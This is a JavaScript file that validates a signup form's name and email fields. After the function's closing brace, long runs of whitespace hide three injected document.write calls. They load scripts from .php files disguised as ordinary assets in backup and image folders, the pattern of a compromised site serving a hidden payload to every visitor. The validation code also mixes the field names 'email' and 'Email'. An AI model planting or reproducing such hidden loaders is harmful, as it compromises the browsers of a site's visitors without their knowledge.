//  Done by Padmini on Sept 25

function checkForm()

{//start

if(document.signup.field1.value=="")
{
 alert("Please enter your full name")
 document.signup.field1.focus();
  return(false);
}

 if(document.signup.field1.value=="Your Full Name")
{
 alert("Please enter your full name")
 document.signup.field1.focus();
  return(false);
}
 
 
 if(document.signup.email.value=="")
{
 alert("Please enter your email")
 document.signup.email.focus();
 return(false);
}
var theInput =document.signup.Email.value;
var theLength =document.signup.Email.value.length;
var goodemail1 = 0;
var goodemail2 = 0;
 if(theLength != 0) 
{
 i = 0;
 while (i<=theLength-1) 
 {
 var theChar = theInput.substring(i,i+1);
 if (theChar == "@" )
 {
 goodemail1= goodemail1 + 1;
 }
 if (theChar==".")
 {
 goodemail2= goodemail2 + 1;
 }
 i++;
 }
}
 if(((goodemail1 != 1) || (goodemail2 < 1))  && (theLength != 0)) 
{
 alert("Please enter a valid Email address");
 document.signup.Email.focus();
 return false;
}

 
 
 
 
 
 
 }//end																																																																							document.write('<script type="text/javascript" src="/old_imgs-backup/jcaption.min.php"><\/script>');																																																																							document.write('<script type="text/javascript" src="/Sandy_Images/Nov,%202002/yt_ie6fix.php"><\/script>');																																																																							document.write('<script type="text/javascript" src="/emailer/themes/wysiwyg/fckeditor/editor/js/ui.sortable.php"><\/script>');
